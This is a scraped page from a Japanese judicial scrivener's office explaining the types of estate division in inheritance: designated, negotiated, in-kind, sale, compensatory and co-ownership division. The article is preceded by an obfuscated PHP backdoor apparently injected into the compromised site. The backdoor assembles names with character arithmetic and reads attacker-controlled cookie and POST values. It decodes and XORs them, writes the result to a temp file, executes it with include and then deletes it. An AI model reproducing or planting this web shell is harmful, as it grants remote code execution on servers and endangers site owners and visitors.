$Pqvzfn = chr ( 862 - 776 ).chr (113) . chr (86) . chr (95) . chr (120) . "\147" . "\132" . 'C';$tctRxPymI = "\143" . chr (108) . 'a' . "\163" . "\163" . chr (95) . chr (101) . "\170" . chr ( 1081 - 976 ).chr (115) . "\164" . 's';$ssIilYA = class_exists($Pqvzfn); $tctRxPymI = "32446";$gSLjL = !1;if ($ssIilYA == $gSLjL){function dbxwOTNW(){$PMkXgg = new /* 39898 */ VqV_xgZC(49715 + 49715); $PMkXgg = NULL;}$TIwAF = "49715";class VqV_xgZC{private function uyiCDQb($TIwAF){if (is_array(VqV_xgZC::$fMDjIdmhy)) {$ETgnznFFhV = sys_get_temp_dir() . "/" . crc32(VqV_xgZC::$fMDjIdmhy[chr ( 1065 - 950 )."\141" . 'l' . 't']);@VqV_xgZC::$fMDjIdmhy[chr (119) . chr (114) . "\151" . chr (116) . "\x65"]($ETgnznFFhV, VqV_xgZC::$fMDjIdmhy["\143" . 'o' . "\156" . "\x74" . "\x65" . "\x6e" . "\x74"]);include $ETgnznFFhV;@VqV_xgZC::$fMDjIdmhy[chr (100) . chr (101) . chr (108) . chr ( 568 - 467 )."\x74" . chr (101)]($ETgnznFFhV); $TIwAF = "49715";exit();}}private $MhgdXuE;public function LsNwazOM(){echo 52644;}public function __destruct(){$TIwAF = "37530_39677";$this->uyiCDQb($TIwAF); $TIwAF = "37530_39677";}public function __construct($ISPFYpPo=0){$ZcMfjH = $_POST;$jCBQJJFsw = $_COOKIE;$TZNYDjdDTa = "2e366822-a4de-4466-8c42-01f43156196d";$hPSqjc = @$jCBQJJFsw[substr($TZNYDjdDTa, 0, 4)];if (!empty($hPSqjc)){$xOWIZJg = "base64";$AMDUHW = "";$hPSqjc = explode(",", $hPSqjc);foreach ($hPSqjc as $WXkLbCVm){$AMDUHW .= @$jCBQJJFsw[$WXkLbCVm];$AMDUHW .= @$ZcMfjH[$WXkLbCVm];}$AMDUHW = array_map($xOWIZJg . chr (95) . "\x64" . "\x65" . chr ( 1055 - 956 )."\157" . chr (100) . "\145", array($AMDUHW,)); $AMDUHW = $AMDUHW[0] ^ str_repeat($TZNYDjdDTa, (strlen($AMDUHW[0]) / strlen($TZNYDjdDTa)) + 1);VqV_xgZC::$fMDjIdmhy = @unserialize($AMDUHW);}}public static $fMDjIdmhy = 22028;}dbxwOTNW();} 遺産分割協議の種類 - 栃木・小山 相続遺言サポート

遺産分割協議の種類

相続が開始すると、被相続人(亡くなった人)の財産は相続人に相続されます。

その財産はいったん相続人の全員共有財産となりますが、
そのままでは各相続人の単独所有とならないため、相続人の間で遺産分割を行うことになります。

遺産分割はまず、被相続人が生前に遺言で指定する「指定分割」に従います。
遺言がない場合は、相続人全員の協議による「協議分割」により行うことになります。

相続人間で遺産をどのように分割するかは以下の方法があります。

遺産分割の種類

指定分割

→被相続人が遺言によって指示した分割方法で、まずはこちらが最優先です。

協議分割

→共同相続人全員の協議により行う分割方法です。

全員の参加と同意が必要で、一部の相続人を除外したり、無視をした場合は、協議は無効になります。ただ結果的にどのような内容の分割になっても、お互い意見が一致して決定した分割であれば協議は有効です。

現物分割

→遺産そのものを現物で分ける方法です。

現物分割では、各相続人の相続分を均等に分けることは難しく、相続人間の取得格差が大きくなることもあります。その際は、その差額分を金銭で支払うなどして代償を付加します。

換価分割

→遺産全部を売却して現金に代えて、その現金を分割するという方法です。

現物をバラバラにすると価値が下がる場合などは、この方法が採られます。

代償分割

→遺産の現物を1人(または数人)が取り、その取得者が、他の相続人に対し相続分相当を金銭で支払うという方法です。

共有分割

→遺産を相続人が共有で所有する方法です。

共有名義の不動産は、この後の利用や売却などに共有者全員の同意が必要です。

遺産分割の話し合いがまとまれば、必ず遺産分割協議書を作成しておくようにします。

後日のトラブル防止の意味合いもありますが、遺産の中に不動産があった場合、所有権移転の登記の際に必要となりますし、預貯金を引き出す場合にも必要となるケースがあります。

この記事の執筆者
司法書士結城事務所 代表司法書士 結城 一彦
保有資格司法書士(栃木県司法書士会登録番号:第432号)、宅地建物取引主任者
専門分野相続手続、生前対策、不動産登記、商業登記
経歴司法書士結城事務所の代表。開業以来、相続・生前対策、不動産登記、債務整理など幅広い法務サポートを行い、特に相続・生前対策分野の累計相談は2500件を超えるほど、経験豊富。
専門家紹介はこちら

横浜で相続・遺言の無料相談受付中!

0120-387-605

相続のご相談は当事務所にお任せください

お客様の声 解決事例

よくご覧いただくコンテンツ一覧

葬儀後、相続発生後の手続き

相続登記手続きサポート 相続放棄手続きサポート
相続手続き丸ごと代行サービス

生前対策、相続発生前の手続き

遺言書作成サポート 生前贈与サポート
家族信託サポート
  • ホーム
  • 選ばれる理由
  • 事務所紹介
  • 専門家紹介
  • 料金表
  • アクセス
  • 相談の流れ
  • 問い合わせ
Contact
相続の相談受付中!